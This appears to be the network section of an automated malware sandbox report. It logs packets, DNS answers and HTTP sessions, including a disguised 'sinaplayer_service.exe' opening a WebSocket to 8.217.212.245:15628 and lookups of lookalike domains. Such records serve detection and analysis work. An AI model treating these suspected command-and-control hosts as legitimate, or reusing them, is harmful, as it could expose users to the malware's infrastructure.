                                                                                                                                                                                                  Dec 29, 2024 16:30:24.871861935 CET49880443192.168.2.513.227.9.159
                                                                                                                                                                                                  Dec 29, 2024 16:30:24.871887922 CET4434988013.227.9.159192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:24.871895075 CET49880443192.168.2.513.227.9.159
                                                                                                                                                                                                  Dec 29, 2024 16:30:24.871901035 CET4434988013.227.9.159192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:24.871972084 CET4434988013.227.9.159192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:24.951517105 CET49879443192.168.2.513.227.9.159
                                                                                                                                                                                                  Dec 29, 2024 16:30:24.971657991 CET4434988113.227.9.159192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:24.971787930 CET49881443192.168.2.513.227.9.159
                                                                                                                                                                                                  Dec 29, 2024 16:30:24.977844000 CET49881443192.168.2.513.227.9.159
                                                                                                                                                                                                  Dec 29, 2024 16:30:24.977854013 CET4434988113.227.9.159192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:24.977933884 CET4434988113.227.9.159192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:24.978195906 CET49881443192.168.2.513.227.9.159
                                                                                                                                                                                                  Dec 29, 2024 16:30:24.978212118 CET4434988113.227.9.159192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:25.063191891 CET49880443192.168.2.513.227.9.159
                                                                                                                                                                                                  Dec 29, 2024 16:30:25.063204050 CET4434988013.227.9.159192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:25.081782103 CET443498788.223.59.119192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:25.081923008 CET49878443192.168.2.58.223.59.119
                                                                                                                                                                                                  Dec 29, 2024 16:30:25.084753990 CET49878443192.168.2.58.223.59.119
                                                                                                                                                                                                  Dec 29, 2024 16:30:25.084765911 CET443498788.223.59.119192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:25.084964991 CET443498788.223.59.119192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:25.085035086 CET49878443192.168.2.58.223.59.119
                                                                                                                                                                                                  Dec 29, 2024 16:30:25.085916042 CET49887443192.168.2.523.98.101.155
                                                                                                                                                                                                  Dec 29, 2024 16:30:25.085938931 CET4434988723.98.101.155192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:25.086014986 CET49887443192.168.2.523.98.101.155
                                                                                                                                                                                                  Dec 29, 2024 16:30:25.086633921 CET49887443192.168.2.523.98.101.155
                                                                                                                                                                                                  Dec 29, 2024 16:30:25.086648941 CET4434988723.98.101.155192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:25.141535997 CET49881443192.168.2.513.227.9.159
                                                                                                                                                                                                  Dec 29, 2024 16:30:25.172447920 CET49880443192.168.2.513.227.9.159
                                                                                                                                                                                                  Dec 29, 2024 16:30:25.725729942 CET4434988013.227.9.159192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:25.725811005 CET4434988013.227.9.159192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:25.725886106 CET49880443192.168.2.513.227.9.159
                                                                                                                                                                                                  Dec 29, 2024 16:30:25.726362944 CET49880443192.168.2.513.227.9.159
                                                                                                                                                                                                  Dec 29, 2024 16:30:25.726378918 CET4434988013.227.9.159192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:25.726475954 CET49880443192.168.2.513.227.9.159
                                                                                                                                                                                                  Dec 29, 2024 16:30:25.726481915 CET4434988013.227.9.159192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:25.730695963 CET4434987913.227.9.159192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:25.730813026 CET4434987913.227.9.159192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:25.731070042 CET49879443192.168.2.513.227.9.159
                                                                                                                                                                                                  Dec 29, 2024 16:30:25.731147051 CET49879443192.168.2.513.227.9.159
                                                                                                                                                                                                  Dec 29, 2024 16:30:25.731158972 CET4434987913.227.9.159192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:25.731173992 CET49879443192.168.2.513.227.9.159
                                                                                                                                                                                                  Dec 29, 2024 16:30:25.731179953 CET4434987913.227.9.159192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:25.988178015 CET4434988113.227.9.159192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:25.988291025 CET4434988113.227.9.159192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:49.939178944 CET49946443192.168.2.523.98.101.155
                                                                                                                                                                                                  Dec 29, 2024 16:30:49.939186096 CET4434994623.98.101.155192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:49.939466953 CET4434994623.98.101.155192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:49.939596891 CET49946443192.168.2.523.98.101.155
                                                                                                                                                                                                  Dec 29, 2024 16:30:49.942003965 CET49952443192.168.2.523.98.101.155
                                                                                                                                                                                                  Dec 29, 2024 16:30:49.942027092 CET4434995223.98.101.155192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:49.942114115 CET49952443192.168.2.523.98.101.155
                                                                                                                                                                                                  Dec 29, 2024 16:30:49.942430973 CET49901443192.168.2.535.227.223.56
                                                                                                                                                                                                  Dec 29, 2024 16:30:49.942454100 CET4434990135.227.223.56192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:49.942500114 CET49887443192.168.2.523.98.101.155
                                                                                                                                                                                                  Dec 29, 2024 16:30:49.942516088 CET4434988723.98.101.155192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:49.942643881 CET49941443192.168.2.523.98.101.155
                                                                                                                                                                                                  Dec 29, 2024 16:30:49.942662954 CET4434994123.98.101.155192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:49.942682981 CET49919443192.168.2.58.223.59.119
                                                                                                                                                                                                  Dec 29, 2024 16:30:49.942694902 CET443499198.223.59.119192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:49.942748070 CET49936443192.168.2.523.98.101.155
                                                                                                                                                                                                  Dec 29, 2024 16:30:49.942754984 CET4434993623.98.101.155192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:49.942815065 CET49924443192.168.2.58.223.59.119
                                                                                                                                                                                                  Dec 29, 2024 16:30:49.942838907 CET49878443192.168.2.58.223.59.119
                                                                                                                                                                                                  Dec 29, 2024 16:30:49.942842960 CET443499248.223.59.119192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:49.942845106 CET443498788.223.59.119192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:49.942845106 CET49930443192.168.2.58.223.59.119
                                                                                                                                                                                                  Dec 29, 2024 16:30:49.942851067 CET443499308.223.59.119192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:49.942869902 CET49913443192.168.2.58.223.59.119
                                                                                                                                                                                                  Dec 29, 2024 16:30:49.942877054 CET443499138.223.59.119192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:49.943012953 CET49893443192.168.2.5183.60.146.66
                                                                                                                                                                                                  Dec 29, 2024 16:30:49.943021059 CET44349893183.60.146.66192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:49.943052053 CET49907443192.168.2.58.223.56.120
                                                                                                                                                                                                  Dec 29, 2024 16:30:49.943057060 CET443499078.223.56.120192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:49.943445921 CET49952443192.168.2.523.98.101.155
                                                                                                                                                                                                  Dec 29, 2024 16:30:49.943455935 CET4434995223.98.101.155192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:51.817852974 CET4972515628192.168.2.58.217.212.245
                                                                                                                                                                                                  Dec 29, 2024 16:30:51.938775063 CET15628497258.217.212.245192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:52.192662001 CET4434995223.98.101.155192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:52.192742109 CET49952443192.168.2.523.98.101.155
                                                                                                                                                                                                  Dec 29, 2024 16:30:52.193399906 CET4434995223.98.101.155192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:52.196372986 CET49952443192.168.2.523.98.101.155
                                                                                                                                                                                                  Dec 29, 2024 16:30:52.196602106 CET49952443192.168.2.523.98.101.155
                                                                                                                                                                                                  Dec 29, 2024 16:30:52.196609020 CET4434995223.98.101.155192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:52.196829081 CET4434995223.98.101.155192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:52.198010921 CET49952443192.168.2.523.98.101.155
                                                                                                                                                                                                  Dec 29, 2024 16:30:52.198307991 CET49958443192.168.2.5183.60.146.66
                                                                                                                                                                                                  Dec 29, 2024 16:30:52.198323965 CET44349958183.60.146.66192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:52.198404074 CET49958443192.168.2.5183.60.146.66
                                                                                                                                                                                                  Dec 29, 2024 16:30:52.198961020 CET49958443192.168.2.5183.60.146.66
                                                                                                                                                                                                  Dec 29, 2024 16:30:52.198971033 CET44349958183.60.146.66192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:57.472606897 CET44349958183.60.146.66192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:57.472748995 CET49958443192.168.2.5183.60.146.66
                                                                                                                                                                                                  Dec 29, 2024 16:30:57.474427938 CET49958443192.168.2.5183.60.146.66
                                                                                                                                                                                                  Dec 29, 2024 16:30:57.474441051 CET44349958183.60.146.66192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:57.474643946 CET44349958183.60.146.66192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:57.475105047 CET49958443192.168.2.5183.60.146.66
                                                                                                                                                                                                  Dec 29, 2024 16:30:57.475394011 CET49970443192.168.2.5183.60.146.66
                                                                                                                                                                                                  Dec 29, 2024 16:30:57.475439072 CET44349970183.60.146.66192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:57.475508928 CET49970443192.168.2.5183.60.146.66
                                                                                                                                                                                                  Dec 29, 2024 16:30:57.476088047 CET49970443192.168.2.5183.60.146.66
                                                                                                                                                                                                  Dec 29, 2024 16:30:57.476098061 CET44349970183.60.146.66192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:59.716401100 CET44349970183.60.146.66192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:59.716523886 CET49970443192.168.2.5183.60.146.66
                                                                                                                                                                                                  Dec 29, 2024 16:30:59.718168974 CET49970443192.168.2.5183.60.146.66
                                                                                                                                                                                                  Dec 29, 2024 16:30:59.718178034 CET44349970183.60.146.66192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:59.718363047 CET44349970183.60.146.66192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:59.718419075 CET49970443192.168.2.5183.60.146.66
                                                                                                                                                                                                  Dec 29, 2024 16:30:59.719487906 CET49976443192.168.2.5183.60.146.66
                                                                                                                                                                                                  Dec 29, 2024 16:30:59.719507933 CET44349976183.60.146.66192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:59.719572067 CET49976443192.168.2.5183.60.146.66
                                                                                                                                                                                                  Dec 29, 2024 16:30:59.720194101 CET49976443192.168.2.5183.60.146.66
                                                                                                                                                                                                  Dec 29, 2024 16:30:59.720201969 CET44349976183.60.146.66192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:31:01.970077038 CET44349976183.60.146.66192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:31:01.970158100 CET49976443192.168.2.5183.60.146.66
                                                                                                                                                                                                  Dec 29, 2024 16:31:01.974088907 CET49976443192.168.2.5183.60.146.66
                                                                                                                                                                                                  Dec 29, 2024 16:31:01.974097013 CET44349976183.60.146.66192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:31:01.974333048 CET44349976183.60.146.66192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:31:01.974407911 CET49976443192.168.2.5183.60.146.66
                                                                                                                                                                                                  Dec 29, 2024 16:31:01.975374937 CET49982443192.168.2.5183.60.146.66
                                                                                                                                                                                                  Dec 29, 2024 16:31:01.975410938 CET44349982183.60.146.66192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:31:01.975511074 CET49982443192.168.2.5183.60.146.66
                                                                                                                                                                                                  Dec 29, 2024 16:31:01.983867884 CET49982443192.168.2.5183.60.146.66
                                                                                                                                                                                                  Dec 29, 2024 16:31:01.983896017 CET44349982183.60.146.66192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:31:04.355830908 CET44349982183.60.146.66192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:31:04.355981112 CET49982443192.168.2.5183.60.146.66
                                                                                                                                                                                                  Dec 29, 2024 16:31:04.432112932 CET49982443192.168.2.5183.60.146.66
                                                                                                                                                                                                  Dec 29, 2024 16:31:04.432137012 CET44349982183.60.146.66192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:31:04.432373047 CET44349982183.60.146.66192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:31:04.432440042 CET49982443192.168.2.5183.60.146.66
                                                                                                                                                                                                  Dec 29, 2024 16:31:04.440274000 CET49988443192.168.2.535.227.223.56
                                                                                                                                                                                                  Dec 29, 2024 16:31:04.440310955 CET4434998835.227.223.56192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:31:04.440391064 CET49988443192.168.2.535.227.223.56
                                                                                                                                                                                                  Dec 29, 2024 16:31:04.441778898 CET49988443192.168.2.535.227.223.56
                                                                                                                                                                                                  Dec 29, 2024 16:31:04.441790104 CET4434998835.227.223.56192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:31:04.951416969 CET49946443192.168.2.523.98.101.155
                                                                                                                                                                                                  Dec 29, 2024 16:31:04.951445103 CET4434994623.98.101.155192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:31:06.407907963 CET4434998835.227.223.56192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:31:06.408109903 CET49988443192.168.2.535.227.223.56
                                                                                                                                                                                                  Dec 29, 2024 16:31:06.408128023 CET4434998835.227.223.56192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:31:06.408214092 CET49988443192.168.2.535.227.223.56
                                                                                                                                                                                                  Dec 29, 2024 16:31:06.410620928 CET49988443192.168.2.535.227.223.56
                                                                                                                                                                                                  Dec 29, 2024 16:31:06.410636902 CET4434998835.227.223.56192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:31:06.410797119 CET4434998835.227.223.56192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:31:06.410847902 CET49988443192.168.2.535.227.223.56
                                                                                                                                                                                                  Dec 29, 2024 16:31:06.411441088 CET49994443192.168.2.535.227.223.56
                                                                                                                                                                                                  Dec 29, 2024 16:31:06.411485910 CET4434999435.227.223.56192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:31:06.411557913 CET49994443192.168.2.535.227.223.56
                                                                                                                                                                                                  Dec 29, 2024 16:31:06.412038088 CET49994443192.168.2.535.227.223.56
                                                                                                                                                                                                  Dec 29, 2024 16:31:06.412046909 CET4434999435.227.223.56192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:31:07.211033106 CET49952443192.168.2.523.98.101.155
                                                                                                                                                                                                  Dec 29, 2024 16:31:07.211046934 CET4434995223.98.101.155192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:31:49.461148024 CET44349982183.60.146.66192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:31:49.557102919 CET50020443192.168.2.58.223.56.120
                                                                                                                                                                                                  Dec 29, 2024 16:31:49.557116985 CET443500208.223.56.120192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:31:49.957084894 CET49946443192.168.2.523.98.101.155
                                                                                                                                                                                                  Dec 29, 2024 16:31:49.957103968 CET4434994623.98.101.155192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:31:51.424592972 CET49988443192.168.2.535.227.223.56
                                                                                                                                                                                                  Dec 29, 2024 16:31:51.424612999 CET4434998835.227.223.56192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:31:51.824140072 CET50022443192.168.2.58.223.56.120
                                                                                                                                                                                                  Dec 29, 2024 16:31:51.824152946 CET443500228.223.56.120192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:31:52.224112034 CET49952443192.168.2.523.98.101.155
                                                                                                                                                                                                  Dec 29, 2024 16:31:52.224144936 CET4434995223.98.101.155192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:31:52.831458092 CET4972515628192.168.2.58.217.212.245
                                                                                                                                                                                                  Dec 29, 2024 16:31:52.952248096 CET15628497258.217.212.245192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:31:53.471101046 CET49994443192.168.2.535.227.223.56
                                                                                                                                                                                                  Dec 29, 2024 16:31:53.471131086 CET4434999435.227.223.56192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:31:55.738656044 CET50000443192.168.2.535.227.223.56
                                                                                                                                                                                                  Dec 29, 2024 16:31:55.738706112 CET4435000035.227.223.56192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:31:57.494088888 CET49958443192.168.2.5183.60.146.66
                                                                                                                                                                                                  Dec 29, 2024 16:31:57.494132996 CET44349958183.60.146.66192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:31:57.797127008 CET50004443192.168.2.535.227.223.56
                                                                                                                                                                                                  Dec 29, 2024 16:31:57.797154903 CET4435000435.227.223.56192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:31:59.744635105 CET49970443192.168.2.5183.60.146.66
                                                                                                                                                                                                  Dec 29, 2024 16:31:59.744658947 CET44349970183.60.146.66192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:32:00.062654018 CET50008443192.168.2.58.223.56.120
                                                                                                                                                                                                  Dec 29, 2024 16:32:00.062666893 CET443500088.223.56.120192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:32:02.009656906 CET49976443192.168.2.5183.60.146.66
                                                                                                                                                                                                  Dec 29, 2024 16:32:02.009677887 CET44349976183.60.146.66192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:32:02.371704102 CET50014443192.168.2.58.223.56.120
                                                                                                                                                                                                  Dec 29, 2024 16:32:02.371727943 CET443500148.223.56.120192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:32:04.130717039 CET4972515628192.168.2.58.217.212.245
                                                                                                                                                                                                  Dec 29, 2024 16:32:04.251858950 CET15628497258.217.212.245192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:32:04.465652943 CET49982443192.168.2.5183.60.146.66
                                                                                                                                                                                                  Dec 29, 2024 16:32:04.465671062 CET44349982183.60.146.66192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:32:04.560235977 CET50020443192.168.2.58.223.56.120
                                                                                                                                                                                                  Dec 29, 2024 16:32:04.560251951 CET443500208.223.56.120192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:32:04.960649967 CET49946443192.168.2.523.98.101.155
                                                                                                                                                                                                  Dec 29, 2024 16:32:04.960680008 CET4434994623.98.101.155192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:32:06.427659035 CET49988443192.168.2.535.227.223.56
                                                                                                                                                                                                  Dec 29, 2024 16:32:06.427679062 CET4434998835.227.223.56192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:32:06.826658964 CET50022443192.168.2.58.223.56.120
                                                                                                                                                                                                  Dec 29, 2024 16:32:06.826678991 CET443500228.223.56.120192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:32:07.225675106 CET49952443192.168.2.523.98.101.155
                                                                                                                                                                                                  Dec 29, 2024 16:32:07.225708008 CET4434995223.98.101.155192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:32:08.485672951 CET49994443192.168.2.535.227.223.56
                                                                                                                                                                                                  Dec 29, 2024 16:32:08.485712051 CET4434999435.227.223.56192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:32:10.739265919 CET50000443192.168.2.535.227.223.56
                                                                                                                                                                                                  Dec 29, 2024 16:32:10.739289999 CET4435000035.227.223.56192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:32:12.507688046 CET49958443192.168.2.5183.60.146.66
                                                                                                                                                                                                  Dec 29, 2024 16:32:12.507726908 CET44349958183.60.146.66192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:32:12.811714888 CET50004443192.168.2.535.227.223.56
                                                                                                                                                                                                  Dec 29, 2024 16:32:12.811752081 CET4435000435.227.223.56192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:32:14.744698048 CET49970443192.168.2.5183.60.146.66
                                                                                                                                                                                                  Dec 29, 2024 16:32:14.744724035 CET44349970183.60.146.66192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:32:15.064779043 CET50008443192.168.2.58.223.56.120
                                                                                                                                                                                                  Dec 29, 2024 16:32:15.064798117 CET443500088.223.56.120192.168.2.5
Timestamp, Source Port, Dest Port, Source IP, Dest IP
Timestamp, Source IP, Dest IP, Trans ID, OP Code, Name, Type, Class, DNS over HTTPS
Timestamp, Source IP, Dest IP, Trans ID, Reply Code, Name, CName, Address, Type, Class, DNS over HTTPS
                                                                                                                                                                                                  Dec 29, 2024 16:30:22.244573116 CET1.1.1.1192.168.2.50xf5ddNo error (0)www.google.com172.217.21.36A (IP address)IN (0x0001)false
                                                                                                                                                                                                  Dec 29, 2024 16:30:22.443376064 CET1.1.1.1192.168.2.50x61cdNo error (0)www.yandex.comyandex.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                  Dec 29, 2024 16:30:22.443376064 CET1.1.1.1192.168.2.50x61cdNo error (0)yandex.com77.88.55.88A (IP address)IN (0x0001)false
                                                                                                                                                                                                  Dec 29, 2024 16:30:22.443376064 CET1.1.1.1192.168.2.50x61cdNo error (0)yandex.com77.88.44.55A (IP address)IN (0x0001)false
                                                                                                                                                                                                  Dec 29, 2024 16:30:22.443376064 CET1.1.1.1192.168.2.50x61cdNo error (0)yandex.com5.255.255.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                  Dec 29, 2024 16:30:22.936062098 CET1.1.1.1192.168.2.50xc7eaNo error (0)d1dmgcawtbm6l9.cloudfront.net13.227.9.159A (IP address)IN (0x0001)false
                                                                                                                                                                                                  Dec 29, 2024 16:30:22.936062098 CET1.1.1.1192.168.2.50xc7eaNo error (0)d1dmgcawtbm6l9.cloudfront.net13.227.9.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                  Dec 29, 2024 16:30:22.936062098 CET1.1.1.1192.168.2.50xc7eaNo error (0)d1dmgcawtbm6l9.cloudfront.net13.227.9.24A (IP address)IN (0x0001)false
                                                                                                                                                                                                  Dec 29, 2024 16:30:22.936062098 CET1.1.1.1192.168.2.50xc7eaNo error (0)d1dmgcawtbm6l9.cloudfront.net13.227.9.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                  Dec 29, 2024 16:30:23.075109005 CET8.8.8.8192.168.2.50x8fbeNo error (0)chr.alipayassets.com222.91.58.119A (IP address)IN (0x0001)false
                                                                                                                                                                                                  Dec 29, 2024 16:30:23.075109005 CET8.8.8.8192.168.2.50x8fbeNo error (0)chr.alipayassets.com12.206.118.229A (IP address)IN (0x0001)false
                                                                                                                                                                                                  Dec 29, 2024 16:30:23.075109005 CET8.8.8.8192.168.2.50x8fbeNo error (0)chr.alipayassets.com129.180.217.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                  Dec 29, 2024 16:30:23.075109005 CET8.8.8.8192.168.2.50x8fbeNo error (0)chr.alipayassets.com85.222.79.57A (IP address)IN (0x0001)false
                                                                                                                                                                                                  Dec 29, 2024 16:30:23.082664013 CET8.8.8.8192.168.2.50x7edNo error (0)nit.crash1ytics.com223.61.70.52A (IP address)IN (0x0001)false
                                                                                                                                                                                                  Dec 29, 2024 16:30:23.082664013 CET8.8.8.8192.168.2.50x7edNo error (0)nit.crash1ytics.com142.242.204.31A (IP address)IN (0x0001)false
                                                                                                                                                                                                  Dec 29, 2024 16:30:23.082664013 CET8.8.8.8192.168.2.50x7edNo error (0)nit.crash1ytics.com4.159.142.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                  Dec 29, 2024 16:30:23.082664013 CET8.8.8.8192.168.2.50x7edNo error (0)nit.crash1ytics.com19.88.16.251A (IP address)IN (0x0001)false
                                                                                                                                                                                                  Dec 29, 2024 16:30:23.082664013 CET8.8.8.8192.168.2.50x7edNo error (0)nit.crash1ytics.com124.119.121.174A (IP address)IN (0x0001)false
                                                                                                                                                                                                  Dec 29, 2024 16:30:23.082664013 CET8.8.8.8192.168.2.50x7edNo error (0)nit.crash1ytics.com67.137.174.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                  Dec 29, 2024 16:30:23.235286951 CET8.8.8.8192.168.2.50x2a67No error (0)nal.fqoqehwib.com10.176.38.125A (IP address)IN (0x0001)false
                                                                                                                                                                                                  Dec 29, 2024 16:30:23.235286951 CET8.8.8.8192.168.2.50x2a67No error (0)nal.fqoqehwib.com200.200.101.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                  Dec 29, 2024 16:30:23.235286951 CET8.8.8.8192.168.2.50x2a67No error (0)nal.fqoqehwib.com33.86.72.19A (IP address)IN (0x0001)false
                                                                                                                                                                                                  Dec 29, 2024 16:30:23.235286951 CET8.8.8.8192.168.2.50x2a67No error (0)nal.fqoqehwib.com191.244.156.205A (IP address)IN (0x0001)false
                                                                                                                                                                                                  Dec 29, 2024 16:30:23.235286951 CET8.8.8.8192.168.2.50x2a67No error (0)nal.fqoqehwib.com104.112.172.245A (IP address)IN (0x0001)false
                                                                                                                                                                                                  Dec 29, 2024 16:30:23.235286951 CET8.8.8.8192.168.2.50x2a67No error (0)nal.fqoqehwib.com6.114.13.159A (IP address)IN (0x0001)false
                                                                                                                                                                                                  Dec 29, 2024 16:30:23.235286951 CET8.8.8.8192.168.2.50x2a67No error (0)nal.fqoqehwib.com82.150.106.47A (IP address)IN (0x0001)false
• d1dmgcawtbm6l9.cloudfront.net
• 8.217.212.245:15628
• ws-ap1.pusher.com

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49725 | 8.217.212.245 | 15628 | 7936 | C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exe

Timestamp | Bytes transferred | Direction | Data
Dec 29, 2024 16:29:17.262418985 CET | 230 | OUT | GET /\ HTTP/1.1
Connection: Upgrade
Sec-WebSocket-Key: EHoDnRGHRnGJKgiBCKlZTSJBa
Sec-WebSocket-Version: 13
Upgrade: websocket
Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
Host: 8.217.212.245:15628
Dec 29, 2024 16:29:18.888113976 CET | 148 | IN | HTTP/1.1 101 Switching Protocols
Connection: Upgrade
Upgrade: WebSocket
Sec-WebSocket-Accept: l1EGrYNHe0x2G7V+JaejrBHDn1g=
Content-Length: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49865 | 18.136.139.158 | 80 | 2448 | C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe

Timestamp | Bytes transferred | Direction | Data
Dec 29, 2024 16:30:19.573679924 CET | 265 | OUT | GET /app/4fc436ef36f4026102d7?protocol=5&client=pusher-dotnet-client&version=1.1.2 HTTP/1.1
Host: ws-ap1.pusher.com
Upgrade: websocket
Connection: Upgrade
Sec-WebSocket-Version: 13
Sec-WebSocket-Key: YTViMmFmNmQtNjcxNi00Ng==
Origin: ws://ws-ap1.pusher.com
Dec 29, 2024 16:30:21.080887079 CET | 166 | IN | HTTP/1.1 101 Switching Protocols
Date: Sun, 29 Dec 2024 15:30:20 GMT
Connection: upgrade
Upgrade: websocket
Sec-WebSocket-Accept: 2VjydNfP306k+jnvn4S56zrWENY=
Dec 29, 2024 16:30:21.935425043 CET | 242 | IN | Data Ascii: ~{"event":"pusher:error","data":{"code":4001,"message":"App key 4fc436ef36f4026102d7 not in this cluster. Did you forget to specify the cluster?"}}ZApp key 4fc436ef36f4026102d7 not in this cluster. Did you forget to specify the cluster?
Dec 29, 2024 16:30:22.007287025 CET | 8 | OUT | Data Raw: 88 82 f5 b0 6a 5c f6 58
Data Ascii: j\X


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49879 | 13.227.9.159 | 443 | 2448 | C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-29 15:30:24 UTC | 182 | OUT | GET /rest-api?edns_client_subnet=0.0.0.0%2F0&name=nit.crash1ytics.com.&type=1 HTTP/1.1
Host: d1dmgcawtbm6l9.cloudfront.net
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip
2024-12-29 15:30:25 UTC | 676 | IN | HTTP/1.1 200 OK
Content-Type: application/json; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Server: nginx/1.16.0
Date: Sun, 29 Dec 2024 15:30:25 GMT
Accept-Ranges: none
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
